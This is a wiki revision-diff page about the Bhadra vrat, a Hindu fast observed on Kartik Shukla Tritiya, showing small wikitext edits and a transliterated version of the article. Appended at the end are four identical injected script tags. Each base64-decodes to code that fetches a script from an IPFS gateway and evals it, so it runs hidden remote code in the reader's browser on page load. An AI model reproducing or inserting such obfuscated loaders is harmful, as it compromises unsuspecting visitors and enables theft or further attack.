Difference between revisions of "भद्रा व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[कार्तिक]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]] पर यह व्रत किया जाता है।  
 
*[[कार्तिक]] [[शुक्ल पक्ष|शुक्ल]] [[तृतीया]] पर यह व्रत किया जाता है।  
 
*गोमूत्र एवं यावक लेने के उपरान्त नक्त विधि से व्रत किया जाता है।  
 
*गोमूत्र एवं यावक लेने के उपरान्त नक्त विधि से व्रत किया जाता है।  
 
*प्रति [[मास]] एक [[वर्ष]] तक यह व्रत किया जाता है।
 
*प्रति [[मास]] एक [[वर्ष]] तक यह व्रत किया जाता है।
 
*अन्त में गोदान किया जाता है।  
 
*अन्त में गोदान किया जाता है।  
*ऐसी मान्यता है कि एक कल्प तक गौरी लोक में वास प्राप्त होता है।<ref>हेमाद्रि (व्रत0 1, 483, पद्मपुराण से उद्धरण)</ref>; <ref>काल निर्णिय (330)</ref>
+
*ऐसी मान्यता है कि एक कल्प तक गौरी लोक में वास प्राप्त होता है।<ref>हेमाद्रि (व्रत0 1, 483, पद्मपुराण से उद्धरण</ref>; <ref>काल निर्णिय (330</ref>
  
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • kartik shukl tritiya par yah vrat kiya jata hai.
  • gomootr evan yavak lene ke uparant nakt vidhi se vrat kiya jata hai.
  • prati mas ek varsh tak yah vrat kiya jata hai.
  • ant mean godan kiya jata hai.
  • aisi manyata hai ki ek kalp tak gauri lok mean vas prapt hota hai.[1]; [2]


tika tippani aur sandarbh

  1. hemadri (vrat0 1, 483, padmapuran se uddharan
  2. kal nirniy (330

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>